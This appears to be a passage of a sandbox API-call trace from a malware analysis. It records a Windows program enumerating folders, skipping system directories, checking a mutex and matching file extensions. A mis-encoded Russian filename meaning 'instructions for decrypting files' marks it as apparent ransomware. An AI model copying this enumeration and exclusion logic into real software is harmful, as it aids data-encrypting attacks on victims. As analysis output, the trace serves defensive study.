halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.836] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.836] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0104.836] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=11, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0104.836] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.837] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.837] GlobalUnlock (hMem=0x450004) returned 0 [0104.837] GlobalLock 
(hMem=0x450004) returned 0x58b008 [0104.837] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.837] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.837] GlobalUnlock (hMem=0x450004) returned 0 [0104.837] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.837] GlobalUnlock (hMem=0x45000c) returned 0 [0104.837] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.837] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.839] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=11, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0104.840] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0104.840] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, 
cbMultiByte=18, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 18 [0104.840] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 28 [0104.841] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=10, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 10 [0104.841] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 8 [0104.841] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL 
Server Compact Edition\\ition\\") returned 9 [0104.842] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.842] SHGetMalloc (in: ppMalloc=0x18edcc | out: ppMalloc=0x18edcc*=0x767666bc) returned 0x0 [0104.842] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18edc8 | out: ppidl=0x18edc8) returned 0x0 [0104.842] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.844] SysReAllocStringLen (in: pbstr=0x18ee50*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18ee50*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.845] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.845] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.845] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.845] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.845] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.845] GlobalUnlock (hMem=0x45000c) returned 0 [0104.845] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.845] GlobalLock (hMem=0x450004) returned 0x591988 [0104.845] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.845] GlobalUnlock (hMem=0x45000c) returned 0 [0104.845] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.845] GlobalUnlock (hMem=0x450004) returned 0 [0104.845] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x573400 [0104.846] FindNextFileW (in: hFindFile=0x573400, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.846] FindNextFileW (in: hFindFile=0x573400, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760, dwReserved0=0x0, dwReserved1=0x0, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0104.846] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0104.846] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.846] GlobalLock (hMem=0x450004) returned 0x591988 [0104.846] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.846] GlobalUnlock (hMem=0x450004) returned 0 [0104.846] GlobalLock (hMem=0x450004) returned 0x591988 [0104.846] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.846] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.846] GlobalUnlock (hMem=0x450004) returned 0 [0104.846] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.846] GlobalUnlock (hMem=0x45000c) returned 0 [0104.846] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, 
lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.847] CharLowerBuffW (in: lpsz="DBGHELP.DLL", cchLength=0xb | out: lpsz="dbghelp.dll") returned 0xb [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="h", 
cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", cchWideChar=61, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpUsedDefaultChar=0x0) returned 61 [0104.847] CharLowerBuffW (in: lpsz=".DLL", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllShared\\DW\\DBGHELP.DLL", lpUsedDefaultChar=0x0) returned 4 [0104.848] FindNextFileW (in: hFindFile=0x573400, lpFindFileData=0x18eea4 | out: 
lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0104.848] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0104.848] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.848] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.848] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.848] GlobalUnlock (hMem=0x45000c) returned 0 [0104.848] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.848] GlobalLock (hMem=0x450004) returned 0x593998 [0104.848] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.848] GlobalUnlock (hMem=0x45000c) returned 0 [0104.848] GlobalHandle (pMem=0x593998) returned 0x450004 [0104.848] GlobalUnlock (hMem=0x450004) returned 0 [0104.848] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.849] CharLowerBuffW (in: lpsz="DW20.EXE", cchLength=0x8 | out: lpsz="dw20.exe") returned 0x8 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, 
dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", cchWideChar=58, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft 
Shared\\DW\\DW20.EXEï", lpUsedDefaultChar=0x0) returned 58 [0104.849] CharLowerBuffW (in: lpsz=".EXE", cchLength=0x4 | out: lpsz=".exe") returned 0x4 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".exe", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".exeShared\\DW\\DW20.EXEï", lpUsedDefaultChar=0x0) returned 4 [0104.850] FindNextFileW (in: hFindFile=0x573400, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 1 [0104.850] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0104.850] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.850] GlobalLock (hMem=0x450004) returned 0x591988 [0104.850] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.850] GlobalUnlock (hMem=0x450004) returned 0 [0104.850] GlobalLock (hMem=0x450004) returned 0x591988 [0104.850] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.850] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.850] GlobalUnlock (hMem=0x450004) returned 0 [0104.850] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.850] GlobalUnlock (hMem=0x45000c) returned 0 [0104.850] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.851] CharLowerBuffW (in: lpsz="DWTRIG20.EXE", cchLength=0xc | out: lpsz="dwtrig20.exe") returned 0xc [0104.851] WideCharToMultiByte (in: 
CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: 
CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", cchWideChar=62, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE ", lpUsedDefaultChar=0x0) returned 62 [0104.851] CharLowerBuffW (in: lpsz=".EXE", cchLength=0x4 | out: lpsz=".exe") returned 0x4 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".exe", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".exeShared\\DW\\DWTRIG20.EXE ", lpUsedDefaultChar=0x0) returned 4 [0104.852] FindNextFileW (in: hFindFile=0x573400, 
lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 0 [0104.852] GetLastError () returned 0x12 [0104.852] FindClose (in: hFindFile=0x573400 | out: hFindFile=0x573400) returned 1 [0104.852] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.852] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.852] GlobalUnlock (hMem=0x45000c) returned 0 [0104.852] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.852] GlobalLock (hMem=0x450004) returned 0x591988 [0104.852] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.852] GlobalUnlock (hMem=0x45000c) returned 0 [0104.852] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.852] GlobalUnlock (hMem=0x450004) returned 0 [0104.852] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0104.853] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0104.853] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, 